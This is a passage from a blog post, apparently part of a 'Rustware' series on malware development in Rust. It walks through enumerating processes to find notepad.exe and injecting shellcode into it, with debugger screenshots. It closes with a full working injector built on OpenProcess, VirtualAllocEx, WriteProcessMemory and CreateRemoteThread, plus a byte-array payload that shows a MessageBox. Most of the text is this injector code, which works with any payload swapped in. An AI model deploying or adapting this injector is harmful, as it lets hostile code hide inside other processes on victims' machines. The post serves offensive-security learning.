class="p">,</span><span class="n">target_process</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>Using the <strong>target</strong> flag, we can specifying the i686 architecture and compile the program into a 32bit binary.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img5.png" alt="Screenshot" /> <em><center>Figure 5 - Compile Program for 32bit architecture</center></em></p> <p>Running it, we successfully finds the notepad.exe PID and injects our MessageBox into it.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img6.png" alt="Screenshot" /> <em><center>Figure 6 - MessageBox Process Injection in Notepad.exe</center></em></p> <h2 id="debugging">Debugging</h2> <p>Using Process Hacker and x32dbg we can debug our binary to understand how it works under the hood. We set the breakpoints on the WinAPIs that our binary is going to use.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img7.png" alt="Screenshot" /> <em><center>Figure 7 - x32dbg Breakpoints</center></em></p> <h3 id="createtoolhelp32snapshot">CreateToolhelp32Snapshot</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span> </code></pre></div></div> <p>Running the debugger, we can see that the <strong>CreateToolhelp32Snapshot</strong> is correctly getting the two parameters:</p> <ul> <li>0x2 is <strong>TH32CS_SNAPPROCESS</strong></li> <li>The second parameter is 0x0</li> </ul> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img8.png" alt="Screenshot" /> <em><center>Figure 8 - CreateToolhelp32Snapshot Debug</center></em></p> <p>We can see the snapshot handle in our binary handles list.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img9.png" alt="Screenshot" /> <em><center>Figure 9 - Snapshot Handle</center></em></p> <h3 id="process32first">Process32First</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">Process32First</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> </code></pre></div></div> <p>We can see the two parameters:</p> <ul> <li>0xEC is the snapshot handle</li> <li>0x50F6B4 is the <strong>PROCESSENTRY32</strong> struct address</li> </ul> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img10.png" alt="Screenshot" /> <em><center>Figure 10 - Process32First Debug</center></em></p> <p>The <strong>szExeFile</strong> field is at offset 0x24, so at the address <strong>0x50F6D8</strong>(<strong>0x50F6B4</strong> + 0x24) we can see the process name.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img11.png" alt="Screenshot" /> <em><center>Figure 11 - Process Name in memory</center></em></p> <h3 id="process32next">Process32Next</h3> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">Process32Next</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> </code></pre></div></div> <p>We can see the two parameters:</p> <ul> <li>0xEC is the snapshot handle</li> <li>0x50F6B4 is the <strong>PROCESSENTRY32</strong> struct address</li> </ul> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img12.png" alt="Screenshot" /> <em><center>Figure 12 - Process32Next Debug</center></em></p> <p>By continuing the execution, the WinAPIs seen in the previous blog post are executed and our payload is injected into Notepad.exe.</p> <p><img src="/assets/images/2023-11-06-rustware-part-2-process-enumeration-development/img13.png" alt="Screenshot" /> <em><center>Figure 13 - Process Injection Debug</center></em></p> <h2 id="conclusion">Conclusion</h2> <p>As already said, Rust is a very powerful language; in the last years it found its way into the malware development, especially for ransomware because of its speed. The interaction with WinAPIs is not very easy because of the datatype mismatch.</p> <p>At each iteration, we must manually clean the <strong>szExeFile</strong> field in the <strong>PROCESSENTRY32</strong> struct to clear all the junk chars from the previous process name.</p> <p>In the next blog post I would like to refactoring the code in order to be more “Rusty”.</p> <p>Any feedback will be appreciated.</p> <h2 id="references">References</h2> <ul> <li><a href="https://learn.microsoft.com/en-us/windows/dev-environment/rust/">https://learn.microsoft.com/en-us/windows/dev-environment/rust/</a></li> <li><a href="https://microsoft.github.io/windows-docs-rs/doc/windows/">https://microsoft.github.io/windows-docs-rs/doc/windows/</a></li> <li><a href="https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/">https://socradar.io/why-ransomware-groups-switch-to-rust-programming-language/</a></li> <li><a href="https://crates.io/crates/windows">https://crates.io/crates/windows</a></li> <li><a href="https://doc.rust-lang.org/book/">https://doc.rust-lang.org/book/</a></li> <li><a href="https://www.ired.team/offensive-security/code-injection-process-injection/process-injection">https://www.ired.team/offensive-security/code-injection-process-injection/process-injection</a></li> <li><a href="https://institute.sektor7.net">https://institute.sektor7.net</a></li> <li><a href="https://maldevacademy.com">https://maldevacademy.com</a></li> <li><a href="https://syrion.me/malware/rustware-part-1-shellcode-process-injection-development">https://syrion.me/malware/rustware-part-1-shellcode-process-injection-development/</a></li> <li><a href="https://attack.mitre.org/techniques/T1055/">https://attack.mitre.org/techniques/T1055/</a></li> </ul> <h2 id="final-code">Final Code</h2> <div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">std</span><span class="p">::{</span><span class="nn">ffi</span><span class="p">::</span><span class="nb">c_void</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">size_of</span><span class="p">,</span> <span class="nn">mem</span><span class="p">::</span><span class="n">transmute</span><span class="p">};</span> <span class="k">use</span> <span class="nn">windows</span><span class="p">::{</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">Foundation</span><span class="p">::</span><span class="n">CloseHandle</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">Debug</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Diagnostics</span><span class="p">::</span><span class="nn">ToolHelp</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Memory</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="nn">Win32</span><span class="p">::</span><span class="nn">System</span><span class="p">::</span><span class="nn">Threading</span><span class="p">::</span><span class="o">*</span><span class="p">,</span> <span class="p">};</span> <span class="k">fn</span> <span class="nf">find_pid</span><span class="p">(</span><span class="n">target_process_name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">u32</span> <span class="p">{</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">pe32</span><span class="p">:</span> <span class="n">PROCESSENTRY32</span> <span class="o">=</span> <span class="n">PROCESSENTRY32</span> <span class="p">{</span> <span class="o">..</span><span class="nn">Default</span><span class="p">::</span><span class="nf">default</span><span class="p">()</span> <span class="p">};</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">cur_process_name</span><span class="p">;</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">result_process32</span><span class="p">;</span> <span class="n">pe32</span><span class="py">.dwSize</span> <span class="o">=</span> <span class="nn">size_of</span><span class="p">::</span><span class="o">&lt;</span><span class="n">PROCESSENTRY32</span><span class="o">&gt;</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">;</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_createtoolhelp32snapshot</span> <span class="o">=</span> <span class="nf">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_createtoolhelp32snapshot</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="n">result_process32</span> <span class="o">=</span> <span class="nf">Process32First</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> <span class="k">loop</span> <span class="p">{</span> <span class="k">match</span> <span class="n">result_process32</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">_</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="n">cur_process_name</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">str</span><span class="p">::</span><span class="nf">from_utf8</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pe32</span><span class="py">.szExeFile</span><span class="p">)</span> <span class="nf">.unwrap</span><span class="p">()</span> <span class="nf">.trim_matches</span><span class="p">(</span><span class="nn">char</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span> <span class="k">if</span> <span class="n">cur_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="o">==</span> <span class="n">target_process_name</span><span class="nf">.to_lowercase</span><span class="p">()</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span> <span class="s">"Find {} PID: {}"</span><span class="p">,</span> <span class="n">target_process_name</span><span class="p">,</span> <span class="n">pe32</span><span class="py">.th32ProcessID</span> <span class="p">);</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">);</span> <span class="k">return</span> <span class="n">pe32</span><span class="py">.th32ProcessID</span><span class="p">;</span> <span class="p">}</span> <span class="n">pe32</span><span class="py">.szExeFile</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">;</span> <span class="mi">260</span><span class="p">];</span> <span class="n">result_process32</span> <span class="o">=</span> <span class="nf">Process32Next</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">pe32</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Process32 Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_procsnap</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateToolhelp32Snapshot Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">inject</span><span class="p">(</span><span class="n">pid</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="p">{</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_openprocess</span> <span class="o">=</span> <span class="nf">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_ALL_ACCESS</span><span class="p">,</span> <span class="k">false</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="k">let</span> <span class="k">mut</span> <span class="n">old_protect</span><span class="p">:</span> <span class="n">PAGE_PROTECTION_FLAGS</span> <span class="o">=</span> <span class="nf">PAGE_PROTECTION_FLAGS</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="k">match</span> <span class="n">result_openprocess</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_process</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">remotememory_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="nf">VirtualAllocEx</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">,</span> <span class="p">);</span> <span class="k">if</span> <span class="o">!</span><span class="n">remotememory_ptr</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Allocated Memory Address: {:p}"</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">);</span> <span class="k">let</span> <span class="n">result_writeprocessmemory</span> <span class="o">=</span> <span class="nf">WriteProcessMemory</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">,</span> <span class="n">payload_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_writeprocessmemory</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_virtualprotectex</span> <span class="o">=</span> <span class="nf">VirtualProtectEx</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="n">remotememory_ptr</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READ</span><span class="p">,</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">old_protect</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_virtualprotectex</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(())</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="k">let</span> <span class="n">result_createremotethread</span> <span class="o">=</span> <span class="nf">CreateRemoteThread</span><span class="p">(</span> <span class="n">handle_process</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nf">transmute</span><span class="p">(</span><span class="n">remotememory_ptr</span><span class="p">),</span> <span class="nb">None</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">None</span><span class="p">,</span> <span class="p">);</span> <span class="k">match</span> <span class="n">result_createremotethread</span> <span class="p">{</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">handle_tread</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"Thread Created"</span><span class="p">);</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_tread</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"CreateRemoteThread Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"VirtualProtectEx Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"WriteProcessMemory Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"VirtualAllocEx Error"</span><span class="p">)</span> <span class="p">}</span> <span class="k">let</span> <span class="n">_</span> <span class="o">=</span> <span class="nf">CloseHandle</span><span class="p">(</span><span class="n">handle_process</span><span class="p">);</span> <span class="p">}</span> <span class="nf">Err</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span> <span class="nd">println!</span><span class="p">(</span><span class="s">"OpenProcess Error: {}"</span><span class="p">,</span> <span class="n">error</span><span class="p">)</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">let</span> <span class="n">payload</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">272</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x9b</span><span class="p">,</span> <span class="mi">0xd9</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x71</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x76</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x46</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x36</span><span class="p">,</span> <span class="mi">0x38</span><span class="p">,</span> <span class="mi">0x4f</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xf3</span><span class="p">,</span> <span class="mi">0x59</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xd1</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x60</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x3c</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x54</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x78</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xea</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x4a</span><span class="p">,</span> <span class="mi">0x18</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x34</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xee</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0xfc</span><span class="p">,</span> <span class="mi">0xac</span><span class="p">,</span> <span class="mi">0x84</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x07</span><span class="p">,</span> <span class="mi">0xc1</span><span class="p">,</span> <span class="mi">0xcf</span><span class="p">,</span> <span class="mi">0x0d</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xc7</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0xf4</span><span class="p">,</span> <span class="mi">0x3b</span><span class="p">,</span> <span class="mi">0x7c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x28</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x66</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x0c</span><span class="p">,</span> <span class="mi">0x4b</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x5a</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xeb</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x8b</span><span class="p">,</span> <span class="mi">0x01</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x44</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0xc3</span><span class="p">,</span> <span class="mi">0xb2</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x29</span><span class="p">,</span> <span class="mi">0xd4</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe5</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0x4e</span><span class="p">,</span> <span class="mi">0x0e</span><span class="p">,</span> <span class="mi">0xec</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x9f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0x7e</span><span class="p">,</span> <span class="mi">0xd8</span><span class="p">,</span> <span class="mi">0xe2</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x8e</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0x45</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x6c</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x41</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x33</span><span class="p">,</span> <span class="mi">0x32</span><span class="p">,</span> <span class="mi">0x2e</span><span class="p">,</span> <span class="mi">0x64</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x30</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x0a</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe6</span><span class="p">,</span> <span class="mi">0x56</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x04</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xc2</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xbb</span><span class="p">,</span> <span class="mi">0xa8</span><span class="p">,</span> <span class="mi">0xa2</span><span class="p">,</span> <span class="mi">0x4d</span><span class="p">,</span> <span class="mi">0xbc</span><span class="p">,</span> <span class="mi">0x87</span><span class="p">,</span> <span class="mi">0x1c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xe8</span><span class="p">,</span> <span class="mi">0x5f</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x77</span><span class="p">,</span> <span class="mi">0x61</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x75</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xdb</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x5c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe3</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x58</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x74</span><span class="p">,</span> <span class="mi">0x69</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x49</span><span class="p">,</span> <span class="mi">0x6e</span><span class="p">,</span> <span class="mi">0x6a</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x65</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x73</span><span class="p">,</span> <span class="mi">0x20</span><span class="p">,</span> <span class="mi">0x68</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0x72</span><span class="p">,</span> <span class="mi">0x6f</span><span class="p">,</span> <span class="mi">0x63</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc9</span><span class="p">,</span> <span class="mi">0x88</span><span class="p">,</span> <span class="mi">0x4c</span><span class="p">,</span> <span class="mi">0x24</span><span class="p">,</span> <span class="mi">0x11</span><span class="p">,</span> <span class="mi">0x89</span><span class="p">,</span> <span class="mi">0xe1</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xd2</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0x53</span><span class="p">,</span> <span class="mi">0x51</span><span class="p">,</span> <span class="mi">0x52</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0xd0</span><span class="p">,</span> <span class="mi">0x31</span><span class="p">,</span> <span class="mi">0xc0</span><span class="p">,</span> <span class="mi">0x50</span><span class="p">,</span> <span class="mi">0xff</span><span class="p">,</span> <span class="mi">0x55</span><span class="p">,</span> <span class="mi">0x08</span><span class="p">,</span> <span class="p">];</span> <span class="k">let</span> <span class="n">payload_len</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.len</span><span class="p">();</span> <span class="k">let</span> <span class="n">payload_ptr</span><span class="p">:</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span> <span class="o">=</span> <span class="n">payload</span><span class="nf">.as_ptr</span><span class="p">()</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">c_void</span><span class="p">;</span> <span class="k">let</span> <span 